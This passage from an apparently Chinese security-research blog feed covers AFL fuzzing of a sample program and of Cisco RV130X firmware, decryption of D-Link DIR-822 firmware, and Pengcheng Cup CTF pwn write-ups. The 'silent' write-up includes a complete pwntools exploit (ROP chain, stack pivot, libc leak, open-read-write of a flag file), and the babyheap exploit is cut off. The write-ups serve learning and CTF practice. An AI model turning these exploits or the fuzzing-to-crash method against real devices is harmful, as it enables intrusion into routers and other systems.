class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *usage = <span class="hljs-string">"Usage: %s\n"</span><br> <span class="hljs-string">"Text utility - accepts commands and data on stdin and prints results to stdout.\n"</span><br> <span class="hljs-string">"\tInput | Output\n"</span><br> <span class="hljs-string">"\t------------------+-----------------------\n"</span><br> <span class="hljs-string">"\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"</span><br> <span class="hljs-string">"\thead <N> <string> | The first <N> bytes of <string>.\n"</span>;<br> <span class="hljs-type">char</span> input[INPUTSIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-comment">// Slurp input</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">read</span>(STDIN_FILENO, input, INPUTSIZE) < <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"Couldn't read stdin.\n"</span>);<br> }<br><br> <span class="hljs-type">int</span> ret = <span class="hljs-built_in">process</span>(input);<br> <span class="hljs-keyword">if</span> (ret)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, usage, argv[<span class="hljs-number">0</span>]);<br> };<br> <span class="hljs-keyword">return</span> ret;<br>}<br></code></pre></td></tr></table></figure><p>看起来程序获取来输入后调用process函数进行处理,根据输入的不同进行不同的处理:</p><p>u <N> <string>:对字符串的前n个字节变成大写字符串;<br>head <N> <string>:截取字符串的前n个字符;<br>surprise!:隐藏功能,直接触发崩溃。<br>运行afl-fuzz对程序进行测试:</p><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">afl-fuzz -i inputs -o <span class="hljs-keyword">out</span> ./vulnerable<br></code></pre></td></tr></table></figure><p><code>inputs</code>目录是输入的种子目录,由用户提供,应该是精心准备的样本以有效提高<code>fuzz</code>效率,可以看到系统提供的<code>inputs</code>目录中包含触发<code>u</code>和<code>head</code>的样例:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls<br>afl-screenshot.png inputs <span class="hljs-title class_">Makefile</span> out <span class="hljs-title class_">README</span>.md vulnerable vulnerable.c<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls inputs/<br>head u<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/head <br>head <span class="hljs-number">20</span> <span class="hljs-title class_">This</span> string is going to be truncated at the <span class="hljs-number">20</span>th position.<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/u<br>u <span class="hljs-number">4</span> capsme<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span><br></code></pre></td></tr></table></figure><p>fuzz结果(当时让他fuzz之后就去干其他事情了,其实很快就fuzz好了):</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130050565.png" alt="image-20240113005059484"></p><p><code>out</code>有相应的产出,其中<code>crashes</code>目录存储的是崩溃样本;<code>queue</code>目录存储的是成果触发新路径的样本即有趣的样本。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130052315.png" alt="image-20240113005245259"></p><p>crash输入演示</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130100261.png" alt="image-20240113010011207"></p><h1 id="使用AFL插桩程序(无源码)"><a href="#使用AFL插桩程序(无源码)" class="headerlink" title="使用AFL插桩程序(无源码)"></a>使用AFL插桩程序(无源码)</h1><p>使用的是hollk师傅提供的RV130X_FW_1.0.3.55.bin固件,首先使用binwalk解包</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">binwalk</span> -Me RV130X_FW_<span class="hljs-number">1.0.3.55</span>.bin<br></code></pre></td></tr></table></figure><p>可以解出完整的文件系统</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082126512.png#id=ZPL1s&originHeight=313&originWidth=1792&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>然后使用qemu用户态模拟看jsonparse的输入格式</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs gradle">youlin@ubuntu:~<span class="hljs-regexp">/rw/</span>黑盒<span class="hljs-regexp">/_RV130X_FW_1.0.3.55.bin.extracted$ qemu-arm-static -L ./</span>squashfs-root<span class="hljs-regexp">/ ./</span>squashfs-root<span class="hljs-regexp">/usr/</span>sbin/jsonparse <br><br>usage: jsonparse [<span class="hljs-keyword">file</span>]<br><br>Below is a sample parse result:<br>test2() json_object_get_string(input)=<br>{ <span class="hljs-string">"pagination_response_record"</span>: { <span class="hljs-string">"page_index"</span>: <span class="hljs-string">"1"</span>, <span class="hljs-string">"last_index"</span>: <span class="hljs-string">"1"</span>, <span class="hljs-string">"total_records"</span>: <span class="hljs-string">"2"</span>, <span class="hljs-string">"self_link"</span>: <span class="hljs-string">"https:\/\/api-stage.cisco.com\/software\/stage\/v2.0\/metadata\/udi\/NAME:RV215W,DESCR:Cisco RV215W Wireless N VPN Firewall, PID:RV215W-A-K9-NA, VID:V01, SN:CCQ163612VP\/mdf_id\/284436489\/software_type_id\/282487380\/current_release\/7.0.220.0?output_release=LATEST"</span>, <span class="hljs-string">"page_records"</span>: <span class="hljs-string">"25"</span>, <span class="hljs-string">"title"</span>: <span class="hljs-string">"Get Metadata by UDI, MDF ID & Image Names â<80><93> Download API"</span> }, <span class="hljs-string">"metadata_response"</span>: { <span class="hljs-string">"metadata_trans_id"</span>: <span class="hljs-string">"9746"</span>, <span class="hljs-string">"metadata_id_list"</span>: { <span class="hljs-string">"udi"</span>: <span class="hljs-string">"NAME:RV215W,DESCR:Cisco RV215W Wireless N VPN Firewall, PID:RV215W-A-K9-NA, VID:V01, SN:CCQ163612VP"</span>, <span class="hljs-string">"mdf_id"</span>: <span class="hljs-string">"284436489"</span>, <span class="hljs-string">"software_list"</span>: { <span class="hljs-string">"platform_list"</span>: [ { <span class="hljs-string">"release_list"</span>: [ { <span class="hljs-string">"release_version"</span>: <span class="hljs-string">"1.1.0.5"</span>, <span class="hljs-string">"release_fcs_date"</span>: <span class="hljs-string">"2013-04-10 00:00:00.0"</span>, <span class="hljs-string">"image_details"</span>: [ { <span class="hljs-string">"image_guid"</span>: <span class="hljs-string">"8893B41F4FD3DF71FA3D03B636205BD613BEE766"</span>, <span class="hljs-string">"related_image"</span>: <span class="hljs-string">"N"</span>, <span class="hljs-string">"image_name"</span>: <span class="hljs-string">"RV215W_FW_1.1.0.5.bin"</span>, <span class="hljs-string">"image_size"</span>: <span class="hljs-string">"10912768"</span>, <span class="hljs-string">"image_checksums"</span>: { <span class="hljs-string">"md5_checksum"</span>: <span class="hljs-string">"0e1792082f4a13b8eb256e92ff5ce501"</span> }, <span class="hljs-string">"image_description"</span>: <span class="hljs-string">"RV215W_FW_1.1.0.5.bin"</span>, <span class="hljs-string">"encryption_software_indicator"</span>: <span class="hljs-string">"Y"</span>, <span class="hljs-string">"image_level_docs"</span>: <span class="hljs-keyword">null</span> }, { <span class="hljs-string">"image_guid"</span>: <span class="hljs-string">"187A05709F5BDEEEE38E4002AE014F4659859C2B"</span>, <span class="hljs-string">"related_image"</span>: <span class="hljs-string">"N"</span>, <span class="hljs-string">"image_name"</span>: <span class="hljs-string">"USB_dynamic_module_file.zip"</span>, <span class="hljs-string">"image_size"</span>: <span class="hljs-string">"116182"</span>, <span class="hljs-string">"image_checksums"</span>: { <span class="hljs-string">"md5_checksum"</span>: <span class="hljs-string">"1d6f78a9edbea935026bb8a2be5cc715"</span> }, <span class="hljs-string">"image_description"</span>: <span class="hljs-string">"The USB dynamic module files of RV215W 1.1.0.5 version"</span>, <span class="hljs-string">"encryption_software_indicator"</span>: <span class="hljs-string">"Y"</span>, <span class="hljs-string">"image_level_docs"</span>: <span class="hljs-keyword">null</span> } ], <span class="hljs-string">"release_level_docs"</span>: { <span class="hljs-string">"release_doc_name"</span>: <span class="hljs-string">"Release Notes and Open Source Documentation for 1.1.0.5"</span>, <span class="hljs-string">"release_doc_url"</span>: <span class="hljs-string">"http:\/\/www.cisco.com\/en\/US\/products\/ps9923\/prod_release_notes_list.html"</span>, <span class="hljs-string">"release_doc_type"</span>: <span class="hljs-string">"null"</span> }, <span class="hljs-string">"security_advisory"</span>: <span class="hljs-string">"\/en\/US\/products\/ps9923\/prod_security_advisories_list.html"</span> } ] } ], <span class="hljs-string">"software_type_id"</span>: <span class="hljs-string">"282487380"</span>, <span class="hljs-string">"software_type_name"</span>: <span class="hljs-string">"Wireless Router Firmware"</span> }, <span class="hljs-string">"mdf_concept_name"</span>: <span class="hljs-string">"Cisco RV215W Wireless-N VPN Router"</span> } }, <span class="hljs-string">"service_status"</span>: { <span class="hljs-string">"status"</span>: <span class="hljs-string">"success"</span> } }<br></code></pre></td></tr></table></figure><p>根据hollk师傅所说尽量用短一点的数据进行模糊测试,所以使用下面的数据</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082144437.png#id=eeoQc&originHeight=159&originWidth=2357&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>接着就是fuzz了</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">QEMU_LD_PREFIX=.<span class="hljs-regexp">/squashfs-root/</span> ~<span class="hljs-regexp">/tools/</span>AFLplusplus-stable<span class="hljs-regexp">/afl-fuzz -Q -i ./i</span>nput<span class="hljs-regexp">/ -o ./</span>output<span class="hljs-regexp">/ -- ./</span>squashfs-root<span class="hljs-regexp">/usr/</span>sbin/jsonparse @@<br></code></pre></td></tr></table></figure><p>可以看到还没跑多久就跑出了两个crashes,直接ctrl+c终止,在output目录下看看两个crashes</p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082149470.png#id=TVylF&originHeight=825&originWidth=2139&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082151872.png#id=WCzVJ&originHeight=397&originWidth=2375&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>直接看,我还是有点看不懂,建议直接放到程序去跑一遍</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">qemu-arm-<span class="hljs-keyword">static</span> -L .<span class="hljs-regexp">/squashfs-root/</span> .<span class="hljs-regexp">/squashfs-root/u</span>sr<span class="hljs-regexp">/sbin/</span>jsonparse .<span class="hljs-regexp">/output/</span><span class="hljs-keyword">default</span><span class="hljs-regexp">/crashes/i</span>d\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000000</span>\,time\:<span class="hljs-number">48</span>\,execs\:<span class="hljs-number">89</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/blogyoulin/img/raw/master/images/202305082155411.png#id=NnKkr&originHeight=170&originWidth=2366&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="></p><p>可以看到程序是存在栈溢出的,利用的话就得具体分析了</p>]]></content>
</entry>
<entry>
<title>固件解密学习</title>
<link href="/2023/11/16/%E5%9B%BA%E4%BB%B6%E8%A7%A3%E5%AF%86%E5%AD%A6%E4%B9%A0/"/>
<url>/2023/11/16/%E5%9B%BA%E4%BB%B6%E8%A7%A3%E5%AF%86%E5%AD%A6%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="固件解密思路学习"><a href="#固件解密思路学习" class="headerlink" title="固件解密思路学习"></a>固件解密思路学习</h1><p>固件例子:<a href="https://support.dlink.com/ProductInfo.aspx?m=DIR-822-US">https://support.dlink.com/ProductInfo.aspx?m=DIR-822-US</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242039286.png" alt="img"></p><p>先试用:binwalk -E DIR822C1_FW3,指令查看固件的熵值,发现几乎恒定在1左右,意味着可能对固件的不同部分内容进行了加密</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242039944.png" alt="img"></p><p>在官网给出的文档中,有提到firmware v303WWb04_middle这个中间版本,因此我们需要想办法下载这个中间版本</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242040304.png" alt="img"></p><p>dlink有提供一个FTP服务器来下载固件,但是我貌似不会用(悲),我这里是在异步社区下载的这个中间版本</p><p><a href="https://box.lenovo.com/l/8ufzWe">https://box.lenovo.com/l/8ufzWe</a></p><p>将这个中间版本下载之后使用binwalk进行解包,发现能获得一个完整的文件系统</p><p>使用grep命令在squashfs-root搜索update,firmware,upgrade,download等关键的字符串</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">grep -r Download<br></code></pre></td></tr></table></figure><p>通过对下图进行分析,发现在etc/templates/hnap目录下存在StartFirmwareDownload.php文件,有Download字符串<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045236.png" alt="img"></p><p>打开StartFirmwareDownload.php文件,发现有一行注释为fw encimg </p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045375.png" alt="img"></p><p>可以看到这断代码执行了几个操作:首先使用cat命令读取/etc/config/image_sign的值并赋值给$iamge_sign变量;然后使用fwrite执行了encimg -d -i “.$fw_path.” -s “.$image_sign.</p><p>首先查看/etc/config/image_sign的值</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242045216.png" alt="img"></p><p>内容为wrgac43s_dlink.2015_dir822c1,也就是$image_sign变量的值。下一步就是运行encimg文件,因此查找encimg文件,并确定encimg的文件信息</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047021.png" alt="img"></p><p>可以看到程序为mips大端序架构,将qemu-mips-static移动到当前目录下。使用qemu进行模拟运行</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047504.png" alt="img"></p><p>发现需要添加几个参数才能正常运行,encimg -d -i “.$fw_path.” -s “.$image_sign.,在之前的代码中可以知道fw_patch为加密的固件的路径,image_sign为之前读到的值wrgac43s_dlink.2015_dir822c1</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311242047018.png" alt="img"></p><p>至此固件已经解密成功,后面就可以正常binwalk解包进行分析然后挖洞了</p>]]></content>
</entry>
<entry>
<title>鹏城杯复现</title>
<link href="/2023/11/05/%E9%B9%8F%E5%9F%8E%E6%9D%AF%E5%A4%8D%E7%8E%B0/"/>
<url>/2023/11/05/%E9%B9%8F%E5%9F%8E%E6%9D%AF%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="silent"><a href="#silent" class="headerlink" title="silent"></a>silent</h1><p>一个只有输入的题目</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051232949.png" alt="image-20231105123242872"></p><p>看puruse师傅的exp是找到了一个gadget:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-number">0x00000000004007e8</span> : <span class="hljs-keyword">add</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span> [<span class="hljs-built_in">rbp</span> - <span class="hljs-number">0x3d</span>], <span class="hljs-built_in">ebx</span> <span class="hljs-comment">; nop dword ptr [rax + rax] ; ret</span><br></code></pre></td></tr></table></figure><p>根据经验找关于add的gadget:</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">ROPgadget --binary <span class="hljs-keyword">silent</span> |<span class="hljs-keyword">grep</span> <span class="hljs-built_in">add</span><br></code></pre></td></tr></table></figure><p>接着就是想办法栈迁移到bss段上并且利用csu上面的gadget控制rbx寄存器从而修改bss段上的stdout</p><p>先计算出stdout的地址与puts的真实地址之间的偏移:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051241505.png" alt="image-20231105124124407"></p><p>转换为16进制:0xffffffffffc94210</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311051244274.png" alt="image-20231105124441240"></p><p>这时候就可以确定思路将stdout的真实地址修改为puts,payload:</p><figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">payload</span>=<span class="hljs-variable">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span><span class="hljs-variable">x40</span>+<span class="hljs-variable">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-function"><span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rbx_rbp_r12_r13_r14_r15</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">xffffffffffc94210</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">stdout</span>+<span class="hljs-number">0</span><span class="hljs-variable">x3d</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">4</span>+<span class="hljs-title">p64</span>(<span class="hljs-variable">magic</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rsi_r15</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">x601b10</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">read_plt</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">pop_rbp</span>)+<span class="hljs-title">p64</span>(<span class="hljs-number">0</span><span class="hljs-variable">x601b10</span>-<span class="hljs-number">8</span>)+<span class="hljs-title">p64</span>(<span class="hljs-variable">leave_ret</span>)</span><br><span class="hljs-function"><span class="hljs-title">s</span>(<span class="hljs-variable">payload</span>)</span><br></code></pre></td></tr></table></figure><p>接着再利用csu的call ds:(__frame_dummy_init_array_entry - 600D90h)[r12+rbx*8],call stdout从而调用puts泄露出libc地址,payload:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">payload1=<span class="hljs-built_in">p64</span>(pop_rbx_rbp_r12_r13_r14_r15)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601020)+<span class="hljs-built_in">p64</span>(elf<span class="hljs-selector-class">.got</span><span class="hljs-selector-attr">[<span class="hljs-string">'alarm'</span>]</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>+<span class="hljs-built_in">p64</span>(csu_2)+<span class="hljs-built_in">p64</span>(pop_rsi_r15)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601310)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">2</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">3</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">4</span>)+<span class="hljs-built_in">p64</span>(pop_rbp)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x601a00+<span class="hljs-number">0</span>x40)+<span class="hljs-built_in">p64</span>(read_ptr)+b<span class="hljs-string">'./flag\x00\x00'</span><br><span class="hljs-function"><span class="hljs-title">s</span><span class="hljs-params">(payload1)</span></span><br></code></pre></td></tr></table></figure><p>最后就是利用栈迁移打orw了</p><p>完整exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./silent"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">'172.10.0.8'</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 9999<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br><span class="hljs-comment"># add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret</span><br>magic = 0x00000000004007e8<br><br><span class="hljs-attribute">pop_rdi</span>=0x0000000000400963<br><span class="hljs-attribute">pop_rsi_r15</span>=0x0000000000400961<br><span class="hljs-attribute">read_plt</span>=elf.plt[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">read_got</span>=elf.got[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">bss</span>=0x000000000601040<br><span class="hljs-attribute">read_ptr</span>=0x0000000004008DC<br><span class="hljs-attribute">leave_ret</span>=0x0000000000400876<br><span class="hljs-attribute">stdout</span>=0x000000000601020<br><span class="hljs-attribute">csu_1</span>=0x000000000400956<br><span class="hljs-attribute">csu_2</span>=0x000000000400940<br><span class="hljs-attribute">pop_rbx_rbp_r12_r13_r14_r15</span>=0x000000000040095A<br><span class="hljs-attribute">pop_rbp</span>=0x0000000000400788<br><br><span class="hljs-attribute">payload</span>=b'A'*0x40+b'A'*8+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0xffffffffffc94210)+p64(stdout+0x3d)+p64(0)*4+p64(magic)+p64(pop_rsi_r15)+p64(0x601b10)+p64(0)+p64(read_plt)+p64(pop_rbp)+p64(0x601b10-8)+p64(leave_ret)<br>s(payload)<br><br><span class="hljs-attribute">payload1</span>=p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)+p64(1)+p64(0x601020)+p64(elf.got[<span class="hljs-string">'alarm'</span>])+p64(0)<span class="hljs-number">*2</span>+p64(csu_2)+p64(pop_rsi_r15)+p64(0x601310)+p64(0)+p64(1)+p64(2)+p64(3)+p64(4)+p64(pop_rbp)+p64(0x601a00+0x40)+p64(read_ptr)+b<span class="hljs-string">'./flag\x00\x00'</span><br>s(payload1)<br><br><span class="hljs-attribute">libcbase</span>=uu64()-libc.sym[<span class="hljs-string">'alarm'</span>]<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=0x0000000000023a6a+libcbase<br><span class="hljs-attribute">pop_rdx</span>=0x0000000000001b96+libcbase<br><br><span class="hljs-attribute">orw</span>=b'A'*0x40+b'A'*8+p64(pop_rdi)+p64(0x601b10 + len(payload1) - 8)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(write)<br>io.send(orw)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="babyheap"><a href="#babyheap" class="headerlink" title="babyheap"></a>babyheap</h1><p>标准的菜单题,并且在edit和add里面都有off by null漏洞,libc版本为2.38,根据henry师傅的思路选择打栈</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311061610122.png" alt="image-20231106161057065"></p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span 